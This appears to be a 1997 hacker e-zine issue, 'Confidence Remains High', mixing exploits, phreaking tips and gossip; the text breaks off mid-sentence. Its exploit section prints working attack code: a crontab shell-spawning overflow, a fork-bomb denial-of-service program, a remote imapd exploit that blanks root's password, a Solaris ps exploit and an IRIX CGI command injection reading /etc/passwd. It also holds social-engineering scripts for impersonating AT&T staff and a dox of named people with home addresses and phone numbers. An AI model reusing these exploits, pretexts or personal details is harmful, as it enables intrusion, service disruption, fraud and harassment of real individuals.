.oO The CodeZero Oo. .oO Presents Oo. ۲۲۲۲۲۲۲۲۲۲۲ ۲ -C-O-N-F-i-D-E-N-C-E- -R-E-M-A-i-N-S- ۲ ۲ ۲ ۲۲ ۲۲ ۲ ۲ ۲ Issue 003, July 15th 1997. ۲ ۲ ۲۲۲۲۲۲۲۲۲۲۲ Are you on a w1nd0ze / D0s system? We suggest you view this in EDIT.COM For added AsKii effects!@# _ /| k0dek4t sez... \'o O' =(_o_)= "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@" ---------------------------------- -- HTTP://WWW.CODEZ.COM -- ---------------------------------- In This "Added Vitamins And Minerals" Issue : -----=> Section A : Introduction And Cover Story. 1. Confidence Remains High Issue 3....................: Tetsu Khan 2. The Future.........................................: so1o -----=> Section B : Exploits And Code. 1. crontab b00gz......................................: unknown 2. DoS : superforker.c................................: Vio 3. Cool Bot Juarez : personal.tcl.....................: Scorn 4. imapd Remote Exploit...............................: aky / p1 5. Solaris 2.5.1 ps Exploit...........................: J. Zbiciak 6. handler CGI Hole...................................: so1o -----=> Section C : Phones / Scanning / Radio. 1. DTMF Decoder.......................................: xFli 2. Dealing With Directory Assistance Operators........: Qytpo 3. Russian fone #'s (+7 095 XXXxxxx)..................: CyberLirik -----=> Section D : Miscellaneous. 1. More sIn inf0z.....................................: The CodeZero + Friends 2. The Codez That NASA Use............................: so1o 3. Rooting From Bin...................................: so1o 4. DNS Spoofing.......................................: so1o 5. FreeNet............................................: TrN 6. Backdoors Revised..................................: Blk-Majik 7. One Last Thing About The Infamous pHf Technique....: so1o -----=> Section E : World News. 1. Some History.......................................: nobody 2. [GUNNAR] and MadSeason and sIn.....................: so1o 3. "Welcome to the [D]epartment of [O]wned [E]nergy"..: so1o ------=> Section F : Projects. 1. The CodeZero Remote Attack Kit Version 1.00 *FiNAL*: so1o -----=> Section G : The End. (+ Personal Column) =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== 1. Confidence Remains High Issue 3 : Tetsu Khan Because we just cannot keep the payments for www.codez.com up, and the server keeps going up and down and up and down, Confidence Remains High and CodeZero tools will soon be available at the following sites : http://www.insecurity.org/codez/ [ main site, write it down :) ] http://www.7thsphere.com/hpvac/hacking.html [ CRH distro site ] http://www.r0ot.org [ CRH distro site ] Also available thru FTP... ftp.sekurity.org /users/so1o/ [ Codez distro site ] But we are hoping to set up a new SUPER DOMAIN!@# Expect that within the next issue or two, it will have... CooL o-DaY WaReZ eLeeT VMS hAx0RiN TeXt FiLeZ K-r4d ANSi!@# 2. The Future : so1o The Squirel is your friend, love the Squirel, trust the Squirel... so1o =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== 1. crontab b00gz : unknown /* crontab bug */ #include #include long get_esp(void) { __asm__("movl %esp, %eax\n"); } main(int argc, char **argv) { int i, j, offset; char *bar, *foo; unsigned long *esp_plus = NULL; char mach_codes[] = "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; if (argc == 2) offset = atoi(argv[1]); bar = malloc(4096); if (!bar){ fprintf(stderr, "failed to malloc memory\n"); exit(1); } foo = bar; /* copy of original ptr */ esp_plus = (long *)bar; for(i=0; i < 1024 ; i++) *(esp_plus++) = (get_esp() + offset); printf("Using offset (0x%x)\n", (get_esp() + offset)); bar = (char *)esp_plus; for(j=0; j< strlen(mach_codes); j++) *(bar++) = mach_codes[j]; *bar = 0; execl("/usr/bin/crontab", "crontab", foo, NULL); } 2. DoS : superforker.c : Vio This program is fucking evil, I have tested it on a few systems and it just screws them over and sloooOOooows them right down, you cant throw anything at the shell, its pretty sadistic... /* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the bugtraq This program is a beefed up classic denial of service fork()'er :) Compilation: on BSD type of systems do: gcc -DBSD_C -o cvn cvn.c on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c on my linux, I can compile it with both -DBSD_C and -DSYSV_C if your not sure, you can experiment, or compile it without any -D'efines In the future: SunOS signals ignored. Creation of random symlinks for more gory destruction. Using advanced technology coding to make the hard drive blow up with a loud boom and the console explode causing a nuclear meltdown. Direct All Suggestions And Flames to: Vio NOTE: this program is provided for educational purposes only, its author will not take any responsibility for any stupid things you will decide to do. this has been tested, but not the latest version of it. */ #include #include #include #include #include #include #include #define MAX_FILELEN 100 /* The _actual_ max length */ #define MAX_DIRLEN 10 #define START_DIR "/tmp" /* This can be substituted for any directory */ /* that you have write access to */ void dirs_generator(void); main(int argc, char *argv[]) { int fp; char *buff; char chr; unlink(argv[0]); /* You might wanna ignore all the signals you can ignore.. */ signal(SIGINT, SIG_IGN); /* If any of the signals don't work */ signal(SIGHUP, SIG_IGN); /* on the system you are compiling */ signal(SIGTERM, SIG_IGN); /* them on, just erase that line */ signal(SIGALRM, SIG_IGN); signal(SIGBUS, SIG_IGN); signal(SIGFPE, SIG_IGN); signal(SIGILL, SIG_IGN); signal(SIGIOT, SIG_IGN); signal(SIGPIPE, SIG_IGN); signal(SIGQUIT, SIG_IGN); signal(SIGSEGV, SIG_IGN); signal(SIGTRAP, SIG_IGN); signal(SIGUSR1, SIG_IGN); signal(SIGUSR2, SIG_IGN); #ifdef BSD_C signal(SIGPROF, SIG_IGN); signal(SIGSTOP, SIG_IGN); signal(SIGTSTP, SIG_IGN); signal(SIGTTIN, SIG_IGN); signal(SIGTTOU, SIG_IGN); signal(SIGVTALRM, SIG_IGN); signal(SIGXCPU, SIG_IGN); signal(SIGXFSZ, SIG_IGN); #endif #ifdef SYSV_C signal(SIGPOLL, SIG_IGN); signal(SIGPWR, SIG_IGN); #endif if(fork()) { printf("Now crashing and blowing up this system.. have a nice day\n"); printf("You can safely logout, and let the proggie do its work\n"); printf("or you can stick around and watch lag go from 0 to bitch\n"); printf("in a matter of seconds\n"); printf(" --CoViN \n"); exit(0); } fp=open("/tmp/.foo",O_WRONLY|O_CREAT); if(fork()) { while(1) { fork(); buff = malloc(64000); write(fp, buff, 64000); system("uptime"); } } dirs_generator(); } void dirs_generator(void) { char alph[] = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. "; char fl[MAX_FILELEN]; char dir[MAX_DIRLEN]; int i; int flen; printf("Making dirs..\n"); chdir(START_DIR); fork(); /* For the simplicity of the code.. we also want more dir's from */ fork(); /* the START_DIR */ fork(); while(1) { fork(); flen= (rand() % MAX_FILELEN) - 1; for(i=0; i> Persona-Answer" return 1 } return 0 } # function to answer greetings proc pub_greet {nick uhost hand channel args} { global greets greet_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$greets([rand $greet_size]) $nick" putlog "<<$nick>> Persona-Greet" return 1 } return 0 } # function to answer stupid stuff proc pub_stupid {nick uhost hand channel args} { global stupid stupid_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$nick , $stupid([rand $stupid_size])" putlog "<<$nick>> Persona-Stupid" return 1 } return 0 } # function to answer goodbyes proc pub_bye {nick uhost hand channel args} { global bye bye_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$bye([rand $bye_size]) $nick" putlog "<<$nick>> Persona-Bye" return 1 } return 0 } # misc. functions proc pub_tk3 {nick uhost hand channel args} { global persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$nick, check out tk3play at bleh" putlog "<<$nick>> Persona-tk3play" return 1 } return 0 } # function to enforce minimum pause between responses proc persona_pause {} { global persona_flag persona_wait if {$persona_flag} { persona_off utimer $persona_wait persona_on } return 1 } # functions to turn the personality on and off proc persona_on {} { global persona_flag set persona_flag 1 return 1 } proc persona_off {} { global persona_flag set persona_flag 0 return 1 } putlog "Scorn's persona.tcl is loaded" 4. imapd Remote Exploit : aky / p1 This is the slightly upgraded version of this exploit floating around, there is also another, which is very hard to get, which spawns a shell with root access, I have also heard of European hacker groups coding homemade versions and variants which will this, so for the moment, heres this exploit, imapd usually runs on port 143. This version changes the root passwd field to being blank, so you can su to root without a password. I have heard there are problems and limitations with this, but that ain't my problem.. /* This is the remote exploit of the hole in the imap daemon, for Linux. The instruction code is doing open(), write(), and close() system calls, and it adds a line root::0:0.. at the beggining of /etc/passwd (change to /etc/shadow if needed). The code needs to be self modifying since imapd turns everything to lowercase before it pushes it on the stack. The problem is that it rewrites the first line of passwd/shadow, therefore loosing the root password. I'm sorry, but I don't have time to add in the seek syscall. - Akylonius (aky@galeb.etf.bg.ac.yu) [1997] Modifications made on 5.1.97 to accept command line hostname, with 'h_to_ip' function that resolves it to an ip. - p1 (p1@el8.org) */ #include #include #include #include #include #include #include char *h_to_ip(char *hostname); char *h_to_ip(char *hostname) { struct hostent *h; struct sockaddr_in tmp; struct in_addr in; h = gethostbyname(hostname); if (h==NULL) { perror("Resolving the host. \n"); exit(-1); } memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length); memcpy(&in,&tmp.sin_addr.s_addr,4); return(inet_ntoa(in)); } void banner(void) { system("clear"); printf("\nIMAP Exploit for Linux.\n"); printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n"); printf(" Modifications: p1 (p1@el8.org)\n"); } main(int argc, char **argv) { int fd; struct sockaddr_in sckdaddr; char *hostname; char buf[4092]; int i=8; char realegg[] = "\xeb\x58\x5e" "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26" "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8" "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2" "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31" "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31" "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1" "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83" "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80" "\xe8\x83\xff\xff\xff" "/etc/passwdxroot::0:0:r00t:/:/bin/bashx"; char *point = realegg; buf[0]='*'; buf[1]=' '; buf[2]='l'; buf[3]='o'; buf[4]='g'; buf[5]='i'; buf[6]='n'; buf[7]=' '; banner(); if (argc<2) { printf("\nUsage: %s \n\n", argv[0]); exit(-1); } hostname=argv[1]; while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */ buf[i++]=0x90; while(*point) buf[i++]=*(point++); buf[i++]=0x83; /* ebp */ buf[i++]=0xf3; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=0x88; /* ret adr */ buf[i++]=0xf8; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=' '; buf[i++]='b'; buf[i++]='a'; buf[i++]='h'; buf[i++]='\n'; buf[i++]=0x0; if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the socket. \n"); sckdaddr.sin_port=htons(143); sckdaddr.sin_family=AF_INET; sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname)); if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0) perror("Error with connecting. \n"); printf("hmm: \n"); getchar(); write(fd,buf,strlen(buf)+1); printf("hmm: \n"); close(fd); } 5. Solaris 2.5.1 ps Exploit : J. Zbiciak #!/bin/sh # # Exploit for Solaris 2.5.1 /usr/bin/ps # J. Zbiciak, 5/18/97 # # Just copy this into one file, upload it to a system, chmod 755 and # then run it using # change as appropriate CC=gcc # Build the "replacement message" :-) cat > ps_expl.po << E_O_F domain "SUNW_OST_OSCMD" msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n" msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240\014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\202\020\040\073\221\320\040\010\220\033\300\017\202\020\040\001\221\320\040\010" E_O_F msgfmt -o /tmp/foo ps_expl.po # Build the C portion of the exploit cat > ps_expl.c << E_O_F /*****************************************/ /* Exploit for Solaris 2.5.1 /usr/bin/ps */ /* J. Zbiciak, 5/18/97 */ /*****************************************/ #include #include #include #include #define BUF_LENGTH (632) #define EXTRA (256) int main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; /* ps will grok this file for the exploit code */ char *envp[]={"NLSPATH=/tmp/foo",0}; u_long *long_p; u_char *char_p; /* This will vary depending on your libc */ u_long proc_link=0xef70ef70; int i; long_p = (u_long *) buf; /* This first loop smashes the target buffer for optargs */ for (i = 0; i < (96) / sizeof(u_long); i++) *long_p++ = 0x10101010; /* At offset 96 is the environ ptr -- be careful not to mess it up */ *long_p++=0xeffffcb0; *long_p++=0xffffffff; /* After that is the _ctype table. Filling with 0x10101010 marks the entire character set as being "uppercase printable". */ for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++) *long_p++ = 0x10101010; /* build up _iob[0] (Ref: /usr/include/stdio.h, struct FILE) */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x0501FFFF; /* unbuffered output on stream 1 */ /* Note: "stdin" is marked as an output stream. Don't sweat it. :-) */ /* build up _iob[1] */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x4201FFFF; /* line-buffered output on stream 1 */ /* build up _iob[2] */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x4202FFFF; /* line-buffered output on stream 2 */ *long_p =0; /* The following includes the invalid argument '-z' to force the usage msg to appear after the arguments have been parsed. */ execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp); perror("execle failed"); return 0; } E_O_F # Compile it $CC -o ps_expl ps_expl.c # And off we go! exec ./ps_expl 6. handler CGI Hole : so1o New bug that affects most IRIX systems, heres how you use it... telnet target.machine.com 80 GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0 =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== 1. DTMF Decoder : xFli DTMF Decoder plans. ------------------- If you are into bigtime surveillance, or you just have some burning desire to get the phone number of your sisters sexy friend, then you will be interested in this little circuit. Basically, using this, you can use a tape recorder and a pickup coil to record the DTMF tones sent when someone dials a number, or if it is easier to you can wire it up to a phone jack and decode in realtime, and then decode them to get the number dialled. This can cope with speed dialling, but you will need a reasonably good recording to decode successfully. The circuit is simplicity itself, literally only 5 components. I could have included an unreadable ascii circuit diag / pcb layout, but it would have been a waste of time, so the diags are available from http://www.codez.com and other CodeZero sites. The hardware takes the DTMF signal, decodes it and sends it to lpt1, where the binary output of the ic is converted into standard numbers. The simple BASIC program is included. Which is precompiled on http://www.codez.com Component list: ---------------- 1 x SSI202 18 pin Chip 1 x 3.579 MHz quartz crystal 2 x 27n Capacitors 1 x 1M resistor Source: -------- DTMF DECODER SOFTWARE ------------------------------------------ ' Use this to decode the output from the decoder hardware ' Not written by xFli, suggested in an electronics mag. 10 CLS:KEY OFF 20 I=INP(&H279) 30 IF (I AND 128)=128 THEN 30 40 C=0 50 IF (I AND 8)=8 THEN C=C+1 60 IF (I AND 16)=16 THEN C=C+2 70 IF (I AND 32)=32 THEN C=C+4 80 IF (I AND 64)=64 THEN C=C+8 90 IF C=11 THEN PRINT" * ";:GOTO 180 100 IF C=12 THEN PRINT" # ";:GOTO 180 110 IF C=13 THEN PRINT" A ";:GOTO 180 120 IF C=14 THEN PRINT" B ";:GOTO 180 130 IF C=15 THEN PRINT" C ";:GOTO 180 140 IF C=0 THEN PRINT" D ";:GOTO 180 150 IF C=10 THEN PRINT" 0 ";:GOTO 180 160 PRINT C; 170 I=INP(&H279) 180 IF (I AND 128)=0 THEN 180 190 T=TIMER 200 I=INP(&H279) 210 IF (TIMER-T)>5 THEN PRINT:PRINT:GOTO 30 220 IF (I AND 128) = 128 THEN 210 230 GOTO 50 In the magazine, it is advised you use gw-basic, which is included with very very early DOS versions. It may or may not work with qbasic etc. I don't know. These are also for UK tones, maybe they are different in the US. 2. Dealing with directory assistance operators : Qytpo Allright, this information should be made available to everyone who cares to read it. Any information used from this article is to be used at a persons own risk. i will not be held responsible if any of this is used for wrongfull purposes- ( it can, you just have to get really creative ). Well, to start off, the job of the directory assistance operator, is to give out addresses, phone numbers, and area codes, for the information given to them. The operators can search from names, business names, and government names, despite what anyone tells you, an AT&T DIRECTORY ASSISTANCE OPERATOR CAN DO A CNA SEARCH. (Customer name and address) If the particular operator says they cant, then bug them. yell at them. if they dont do it themselves, they will get their supervisor. and if you make it sound really important they can do it. and if all that doesnt work, try to find a naive operator, tell them you are an AT&T administrator, and say, to press (Control+C) to bring up a CNA search on their switch. A CNA search is a very valuable asset, if you cannot find a CNA operator, give a directory assistance operator a whirl, chances are, if you have a brain, and are a decent actor, you can get the listing for the number you give them. Routing. The calls are routed through a large mainframe in each state department How it works: Say you dial, 602-555-1212. that would put you through to an operator ANYWHERE in the United States, where phoenix calls are routed through to. it will not just appear in 602, allthought that is where it is supposed to. If the switches in 602 are full, the call could end up anywhere in the US. When the operator picks up the reciever- (it is actually a headset that beeps). The call is automatically traced to whatever area code they dialed. so if You dialed (602 555 1212). an operator anywhere in the US, would get a listing on their screen, and a default city, in the upper left hand corner [PHOE] (phoenix arizona). [ *note*: depending on the area code, 602 for example, the operator can search the area codes permitted in that area code..] for example, if you dialed 602-555-1212, the operator would be allowed to search in 502 (the other area code in AZ) However, in some area codes, they will make you redial, like LA, or TEXAS, or NEWYORK; they have so many area codes, For example 310 and 210, in LOS ANGELES If you wanted a listing for LOS ANGELES, and dialed 210-555-1212, and wanted a listing for city in los angeles which was 310, they would make you hang up and dial 310-555-1212. (the operator shuld be saying to himself/herself, "no, this kiddie needz to call 310 instead, or i get fired for giving out bad information"...if they have a clue) Sample Call to a D A O for a CNA Search: ( The best way to get info ) ( caller dials 555-1212 in area code ) City please? Yes, this is James Thornton at AT&T the AT&T administrative assistance office. I need you to do a CNA Search for me. I'm sorry sir, we're not permitted to do CNA searches. Yes, I know. May I speak to a supervisor? This is So and So supervisor, how can I help you sir? Yes, this is James Thornton down at the AT&T (also called Excel) office in Florida, we need a CNA search done for a XXX-XXX-XXXX. One moment please. Ok. Ok, I am (or am not) showing a listing for XXX-XXX-XXXX, would you like that listing sir? Yes please, and I would like that verbally. (if you time it just right, you can get the info for free. if yer beige boxing, it doesnt really make a difference tho.) - hang up, say "what" a few times, to make it sound like you didnt get the listing. and hang up before she finishes the second time. she can only bill you while you are on the line, and if she fucks up, you can get away with it with no bill while they read you the number. This method only works for a verbal listing. if yer quick enough. ;) - - - The NPA RULES. - - - NPA dialed : NPAS PERMITTED TO SEARCH IN FROM THE NPA DIALLED -----California---- 213 213 209 408 510 707 916 408 209 510 415 510 707 510 209 408 415 707 916 707 209 415 510 916 714 714 916 209 510 707 -------Texas------- 210 512 915 214 817 903 972 281 409 713 409 281 512 713 817 903 512 210 409 817 915 713 281 409 806 817 915 817 214 409 512 806 903 903 214 409 817 915 210 512 806 817 972 214 817 903 -----New York------ 212 718 914 917 315 518 607 716 516 718 518 315 607 914 607 315 518 716 914 716 315 607 718 212 518 914 914 212 518 607 718 917 (cell) 212 718 914 *note*: all other states can search all NPA's listed in that state. - Qytpo (@#hackers on EFnet) 3. Russian fone #'s (+7 095 XXXxxxx) : CyberLirik Some Interesting ph0ne #'s [07.06.97] Have some real phun with these, they are up-to-date!@# [RUSSiA] +7 095 XXXxxxx ----------------------------------------------------------------------- AT&T Calling Cards Service ----------------------------------------------------------------------- 9740074 Tone System - AT&T Moscow HQ switch to tone mode press 0 to page operator then by pressing "1" ya can record your voice message then by pressing "2" & "3" ya can hear your record :) 7555042 English-speeking AT&T operator 1555042 Also Automate AT&T Calling System is here ( tone mode ) 7555555 Russian-speeking AT&T operator 1555555 No AT&T Tone Machine ! ----------------------------------------------------------------------- Sprintnet Local Dial-Ups 02501 & 03110 DNICs GlobalOne = Sprintnet = Telenet ----------------------------------------------------------------------- 9286344 9600 9280985 9600 9137166 9600 < Only for MAIL 5789119 2400 3428376 9600 real connect 2400 9167373 SprintNet V34-19200 9167272 ??? 9167171 ? 00wait8 RoSprint PPP dialup. ----------------------------------------------------------------------- ROSPAC Local Dial-Ups 02500 DNIC ----------------------------------------------------------------------- 9270003 9600 9563692 9600 9563690 ----------------------------------------------------------------------- Rosnet Dialups 02506 DNIC ----------------------------------------------------------------------- 975-8403 913-3571 921-2103 201-2030 Voice:(095)206-8570,206-8458,206-7238 442-6422 442-8277 442-7022 442-8388 442-7088 442-8577 442-8077 442-6477 Iskra-2: 20-906,33-571 ----------------------------------------------------------------------- IBM net Dial-Up ----------------------------------------------------------------------- 2586420 ----------------------------------------------------------------------- Russia@Online Dial-Ups 28.8Kbps ----------------------------------------------------------------------- 9132376 30 lines 2584120 60 lines 3619999 2584161 Voice phone ! ----------------------------------------------------------------------- InfoNet Euro ----------------------------------------------------------------------- 9150001 28.8 9150005 28.8 2400 temp [unpublished] 2400 temp [unpublished] 2400 temp [unpublished] 2400 temp [unpublished] 2927056 Infonet Euro Voice ! ----------------------------------------------------------------------- Sita Network (AOLGLOBALnet & SCITOR {aka EQUANT} ) ----------------------------------------------------------------------- 9563589 14400 [unpublished] 9676767 24400 9676730 9676731 9676732 9676733 9676734 9676735 9676755 9676759 9676763 9676766 9676784 9562455 SITA voice! phones 9564736 00wait5 pᨭ 業p STB Card. 00wait9 free information service 974 5122 Elvis+,Co Proxy 194.190.195.71. 961 5122 DNS 195.190.195.66. SLIP login: iptest temp 192.168.12.1 PPP login: pptest Password: guest ----------------------------------------------------------------------- CentroNet DialUp www.astro.ru ----------------------------------------------------------------------- 7511704 14400 ----------------------------------------------------------------------- Infotel dialUps [02504] ----------------------------------------------------------------------- 9585475 9580226 9580825 9580575 ----------------------------------------------------------------------- MMTEL DialUPs [02503] ----------------------------------------------------------------------- 3371001 5 lines 2419860 .db 2418340 2461661 ----------------------------------------------------------------------- PTT-Teleport www.ptt.ru ----------------------------------------------------------------------- 946-9383 voice about x.25,28,etc 946-9393 modem PPP ----------------------------------------------------------------------- www.dataforce.net ----------------------------------------------------------------------- 9566749 voice 2889340 ----------------------------------------------------------------------- FaxInfo Demo Tone Voice Line ----------------------------------------------------------------------- 9629424 demo user code : 12345 9759220 Telephone Voice Bulletin Board ----------------------------------------------------------------------- Voice Mail boxes ----------------------------------------------------------------------- 7059285 leave me mail in 80718 box 9253503 Online registration 4 email 9253507 ----------------------------------------------------------------------- Strange #s : ----------------------------------------------------------------------- 2587474 Logon: 2586435 2586411 2586414 30 32 9269199 9500885 9563686 ----------------------------------------------------------------------- Demos 33.8 V34 HST ----------------------------------------------------------------------- 958-19-75 958-19-81 956-62-85 956-62-86 241-05-05 961-32-00 ----------------------------------------------------------------------- www.Cityline.ru V34 ----------------------------------------------------------------------- 2587884 40 lines 9567759 20 2341901 10 2450070 10 2454414 10 9564787 Interport Mailbox ( t0ne ) 9560050 Unknown system ( t0ne ) 9585474 PassWord: _always_ BUSY #s ( unpluged ) 111-11xx 222-2222 980xxxxx .. 999xxxxx ----------------------------------------------------------------------- INTEL PORT : ----------------------------------------------------------------------- 956-4787 Main 434-1565 Registration 202-6934 Demo ----------------------------------------------------------------------- Dial-Ups ----------------------------------------------------------------------- 281-0201 975-0520 (37) 9270003 TYMUSA 956-3692 the same 956-0699 9600 Real Tymnet Voice 9563678 503/9563691 TYM-X25 Sync ----------------------------------------------------------------------- Youth Science Center Linux server ----------------------------------------------------------------------- Data lines: Line 1: 954-0664 (14400, 24h, UUPC only) 2: 954-0058 (14400, 21:00 - 09:00) 3: 954-0914 ( 9600, 21:00 - 09:00) 4: 954-0147 (33600, 24h, PPP only) 5: 954-0144 (33600, 24h, RAS only) 6: 954-0445 (33600, 24h, restricted) Voice Dmitry Ablov 9540012 7473355 ASVT Dial Up Gateway 2 Users: Oleg & Alex 742xxxx Gate to Iskra2 line. Call for 8-097-2nodes 913xxxx Gate to Iskra2 line. Call for 8-097-3nodes 2324626 Comstar Dialup 2329696 9560885 "The Microsoft Network is no longer providing MSN in Russia" ----------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-= Free 800 Services -=-=-=-=-=-=-=-=-=-=- ----------------------------------------------------------------------- Moscow #s 7473320 Rus MCI Operators in California 7473322 Eng connect me to Customer's Service in Russian 7473321 AT&T Operators in New-York 7473323 7473324 Sprint Global, Arizona, USA 7473325 Orua,Canada 7473326 Otele Code ? 7473327 National Calling Center, UK 28 7473329 Japan 7473356 Sprint Calling Cards 57 7473359 France service 60 7473361 Italian service 7473363 Chili ? service National Russian #s 8-10 800 4977211 - ( AT&T); 8-10 800 4977222 - ( MCI); 8-10 800 4977255 - ( Sprint) ; 8-10 800 4977220 - (MCI ᪮筠 㦡); 8-10 800 4977233 - (Teleglob); 8-10 800 4977266 - ⠭(BT); 8-10 800 4977277 - ⠭( Mercuri); 8-10 800 4977288 - ; 8-10 800 4977181 - ( KDD); 8-10 800 4974358 - ﭤ( Telecom Finland); 8-10 800 4977032 - 죨 (Belgacom, ᯮ짮- 祪); 8-10 800 4977212 - 죨 ( Belgacom, १ - ); 8-10 800 4977039 - ⠫ (Iritel); 8-10 800 4977353 - ૠ ( Telecom Iriland); 8-10 800 4977156 - ; 8-10 800 4977165 - ; 8-10 800 4977141 - . =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== 1. sIn inf0z part 3 : The CodeZero + Friends sIn are 0fficially property of the CodeZero. ------------------------------------------------------------------------------- Alias : Evil Chick Real Name : Suzette Kimminau Address : 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Telephone : (206)454-7176 Email : evilchic@NWLINK.COM ------------------------------------------------------------------------------- Alias : \\StOrM\\ Real Name : Jason Sloderbeck Address : 5739 N Norton, Kansas City, MO 64119 USA Telephone : (816)453-8722 Email : storm@SINNERZ.COM ------------------------------------------------------------------------------- Alias : JDKane Real Name : Kim Address : 327 E Park Road, Round Lake, IL 60073 USA Telephone : (847)546-9154 Email : ------------------------------------------------------------------------------- Alias : JeNnYGrRl Real Name : Jennifer Chambers Address : Kansas City, MO 61421 USA Telephone : Email : ------------------------------------------------------------------------------- We got more, but not complete, They can run, but they can never hide, http://www.codez.com/inf0z.html 2. The Codez That NASA Use : so1o w0wie, I got myself some eleet NASA system security juarez...And people have leeched them from me, like lame undernet groups with no skill. ::: LaRCSCAN ::: NAIAD ---These Are The *EXACT* Files Taken From The nasatool.zip.gz I have---------- (readme.larcscan) The LaRCSCAN program is a working prototype rather than a finished product, thus requiring a few explanations. SETTING UP ---------- LaRCSCAN is a combination of fifty script and c-language files. (No need to compile the c code, the scripts will do it ). To set up to run LaRCSCAN create a directory LARCSCAN in the users home directory. Copy LARCSCAN.tar into this directory. Do a tar -xf LARCSCAN.tar. This will create a 'project' directory containing all the script and 'C' files. Next create a directory 'LARCSCAN/data' . In this directory you wil create two files- 'hname1' and 'uname2'. These should be plain ascii text files. The first (hname1) will contain a list of all the target machine host names, one name per line. Example: viper machine2 dumbo (These may also use the longer format i.e. 'dumbo.larc.nasa.gov') The second (uname2) should contain a list of standard vendor account names you wish to check. Example: guest tutor 4Dgifts demo demos lp There is an extensive list of these names in the file named 'acctlist'. We normally run 6 to 8 of these each month, rotating through the list. They are used in the 'rsh' attempts and using too many can cause the process to be extremely slow. Before running LaRCSCAN, there are several places code must be changed to reflect the user, host and domain running the scan. The following changes should be make: FILE CURRENT TEXT REPLACEMENT --- ----------- ----------- ftpsc 'jpark@bize' your username@your hostname fptss 'jpark@bize' your username@your hostname getftp.sh 'jpark@bize' your username@your hostname getftpss.sh 'jpark@bize' your username@your hostname ftpsc '#local=larc.nasa.gov' '#local='your complete domain ftpss '#local=larc.nasa.gov' '#local='your complete domain hostsljc '#local=larc.nasa.gov' '#local='your complete domain rshss '#local=larc.nasa.gov' '#local='your complete domain rshsc '#local=larc.nasa.gov' '#local='your complete domain shownlj '#local=larc.nasa.gov' '#local='your complete domain line.c 'strncmp(pl.hdr,"larc",n)' substitute the site portion of your domainname (lerc,arc,jpl,etc) for 'larc' These changes are necessary in order for your results to be accurate. The C code is compiled (by the script files) using cc with the -o (next token is output file) option. If this compiler is not used on the scanning machine, you should be able to substitute the appropriate compiler command and option. Compilation occurs from: exec1.sh exec2.sh rshsc rshss shownlj RUNNING LaRCSCAN ---------------- LaRCSCAN can take quite a while (days) to run to completion, so it is reccommended that it be run in the background mode. We do this either with crontab starting it at a specified time/date or through the use of 'nohup'. The command that starts the process is 'sh tst1.sh' (in the project directory). The necessary subdirectories and files will be created as needed. RESULTS ------- The first report (LARCSCAN/result/result.db) is a summary of the results from each target machine. It starts with the date the scan began and the total number of target hosts. The next line is the column header line, containing the following abbreviations: HTNAME - hostname HUK - host known (is the hostname an active host) TFTP-trivial ftp (is the trivial ftp utility active on this host) FTP-anonymous ftp (is anonymous ftp active on this host) There can several valid responses in this column. No-anonymous ftp is not active Yes_No-anonymous ftp is active but no password file was captured. Yes_Yes-anonymous ftp is active and a password file was captured. ALIAS-were the 'decode' or 